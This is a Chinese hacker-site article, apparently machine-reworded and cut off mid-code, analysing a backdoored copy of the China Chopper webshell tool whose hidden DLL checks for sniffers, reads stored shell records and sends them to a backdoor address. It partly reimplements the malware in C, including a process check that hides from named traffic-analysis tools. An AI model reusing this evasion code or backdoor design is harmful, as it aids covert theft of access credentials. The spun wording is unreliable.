中国菜刀-它到底做错了什么?
手机扫一扫
黑客病毒漏洞黑防入侵DDOS病毒硬件
黑资讯>入侵渗透>中国菜刀-它到底做错了什么?

中国菜刀-它到底做错了什么?

入侵渗透hacker2019-06-06 11:50:0814064A+A-

中国菜刀-它究竟做不对哪些?

前因后果

很长过段时间一直忙里偷闲,但做为人们都要做些哪些,否则会发疯,因此我挑选了一天到晚在群里瞎胡扯,瞎胡扯都是门大学问,扯的好或是不太好,都不可以把这一淡长期的扯下去,因此我刚开始找寻哪个说白了的均衡-咸中带淡、淡中带咸,只有这并不是重中之重,这儿也不表了。在近期的瞎胡扯中有堂哥说搜集上了这款中国菜刀,这个中国菜刀不同寻常,别人动了手和脚,因此总有了下文。

爱之初体验

获得样版后,立即压解,发觉很清新就5个文档和文件夹名称,也对伐,中国菜刀原本也没好多个文档和文件夹名称,如下图所示:

看过一下下标志应当是13款的中国菜刀,可是db.tmp是什么玩意?WTF!先给db.tmp重命名为db.tmp.bak,再开启caidao.exe发觉立即系统错误了,如下图所示:

见到上边的出错,立即能够确实db.tmp是1个dll文档,确实许多人会提出质疑为何并不是临时文件呢?立即用C32asm开启看一下文档头吧,如下图所示:

家里的临时文件张那样么?又有杠精会提出质疑为何并不是exe呢?把db.tmp.bak改成db.tmp,一切正常开启中国菜刀,应用火绒内嵌的火绒剑查询caidao.exe系统进程应用的控制模块,发觉目录中存有db.tmp,如下图所示:

这儿重中之重安利一下火绒的火绒剑,剖析就用火绒剑,网络黑客用了都答应,美乐家完毕,说回正题。

都了解db.tmp是dll了,也别藏着掖着了,立即更名叫db.dll患上,清楚一目了然。应用C32asm开启db.dll文档,看一下大葫芦里都卖的什药。

慢慢的走慢慢看,渐渐向下翻,翻过山和海洋在一望无际空格符中见到了,措不及防的粗俗,要我痛心到喘不过气来,如下图所示:

强忍痛心再次向下看,越过熙熙攘攘在一望无际空格符中又见到了,别在拆磨我了,俗语说:因此情深留不住,只能套路得人心。来个套路吧!别再深情告白了,各位看官都跑了,如下图所示:

谁TM还没有点小性子,再TM出現我TM不看了,即使做咸鱼,我TM还要做最咸的那这条!

再次向下看,发觉存有对系统进程的实际操作,及其N多流量统计专用工具的系统进程名,如下图所示:

再次向下看,发觉对数据库查询开展联接,并获得了表的所有统计数据,如下图所示:

这一表里边储存的是什么?开启中国菜刀并加上统计数据,如下图所示:

应用专用工具查询db.mdb数据库查询表的內容,发觉储存的是shell纪录,如下图所示:

再向下看,发觉侧门详细地址,如下图所示:

相关爱之初体验阶段能够小结为,根据对caidao.exe文档开展改动,使caidao.exe载入db.tmp文档,对db.tmp文档剖析获知该文档是dll,该dll建立的作用能够小结给出:

分辨系统进程名中是不是存有流量统计专用工具

连接数据库并获得shell信息内容

应用.compost请求传送shell信息内容

爱之再试探

对爱之初体验阶段小结的作用应用编码开展复现。

分辨某一系统进程名是不是存有

#include"tlhelp32.h"

DWORD GetProcessIdFromName(LPCWSTR name)

{

    PROCESSENTRY32 pE;

    DWORD Id = 0;

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    pE.dwSize = sizeof(PROCESSENTRY32);

    if (!Process32First(hSnapshot, &pE))

       return 0;

    while (1)

    {

       pE.dwSize = sizeof(PROCESSENTRY32);

       if (Process32Next(hSnapshot, &pE) == FALSE)

         break;

       if (wcscmp(pE.szExeFile, name) == 0)

       {

         Id = pE.th32ProcessID;

         break;

       }

    }

    CloseHandle(hSnapshot);

    return Id;

}

if(GetProcessIdFromName(_T("calc.exe")) || GetProcessIdFromName(_T("WSockExpert_fr.exe")) || GetProcessIdFromName(_T("WSockExpert.exe")) || GetProcessIdFromName(_T("CHKenCap.exe")) || GetProcessIdFromName(_T("SmartSniff.exe")) || GetProcessIdFromNa


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
漏洞黑客黑客技术黑客网站黑客博客黑客论坛黑客入门免费黑客网黑客教程渗透测试渗透培训代码审计白帽黑客黑客软件黑客工具

相关文章

  • 4条评论
  • 冬马芩酌2022-05-28 04:10:29
  • nbsp;    {         Id = pE.th32ProcessID;         break;
  • 礼忱苍阶2022-05-28 06:37:50
  • nbsp;   if (!Process32First(hSnapshot, &pE))       return 0;    while (1)&n
  • 泪灼矫纵2022-05-28 06:59:56
  • mp(pE.szExeFile, name) == 0)       {         I
  • 弦久觅遇2022-05-28 04:31:01
  • 展改动,使caidao.exe载入db.tmp文档,对db.tmp文档剖析获知该文档是dll,该dll建立的作用能够小结给出:分辨系统进程名中是不是存有流量统计专用工具连接数据库并获得shel
发表评论

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理